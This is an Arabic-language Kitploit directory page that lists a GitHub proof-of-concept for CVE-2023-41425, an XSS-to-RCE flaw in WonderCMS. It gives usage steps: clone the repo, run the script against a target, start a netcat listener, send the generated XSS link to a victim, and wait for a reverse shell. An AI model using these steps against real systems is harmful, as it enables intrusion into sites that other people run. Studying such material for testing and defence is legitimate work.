Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-41425-wonderCMS_RCE — CVE-2023-41425 - ثغرة برمجة نصية عبر المواقع في Wonder CMS الإصدار 3.2.0 حتى 3.4.2 تسمح لمهاجم عن بعد بتنفيذ تعليمات برمجية عشوائية عبر نص برمجي معدل يتم تحميله إلى مكون installModule. | Kitploit
أدوات/GitHubGitHub/thefizzyfish/cve-2023-41425-wondercms_rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubthefizzyfish/cve-2023-41425-wondercms_rce

CVE-2023-41425-wonderCMS_RCE

CVE-2023-41425 - ثغرة برمجة نصية عبر المواقع في Wonder CMS الإصدار 3.2.0 حتى 3.4.2 تسمح لمهاجم عن بعد بتنفيذ تعليمات برمجية عشوائية عبر نص برمجي معدل يتم تحميله إلى مكون installModule.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد
مشاركة

CVE-2023-41425-wonderCMS_RCE

ثغرة برمجية من نوع Cross Site Scripting في Wonder CMS الإصدار 3.2.0 حتى 3.4.2 تسمح لمهاجم عن بعد بتنفيذ كود عشوائي عبر نص برمجي مصمم يتم رفعه إلى مكون installModule. لأغراض تعليمية فقط

يتطلب معرفة loginURL، صلاحيات المدير أو القدرة على جعل المدير ينقر على رابط XSS.

  1. استنساخ المستودع
root@kitploit:~
git clone https://github.com/thefizzyfish/CVE-2023-41425-wonderCMS_RCE.git
  1. تشغيله
root@kitploit:~
usage: CVE-2023-41425.py [-h] -rhost RHOST -lhost LHOST -lport LPORT -sport SPORT
python3 CVE-2023-41425.py -rhost http://example.com/loginURL -lhost 10.10.14.7 -lport 9001 -sport 8000
  1. إعداد مستمع محلي
root@kitploit:~
nc -lnvp 9001
  1. أرسل رابط XSS المطبوع للضحية أو إذا كان لديك صلاحيات مدير فانقر عليه
  2. انتظر اتصالاً عائداً

image

شكر وتقدير

لـ prodigiousMind لاكتشافه والإبلاغ عن الثغرة https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413

تنزيل الأداة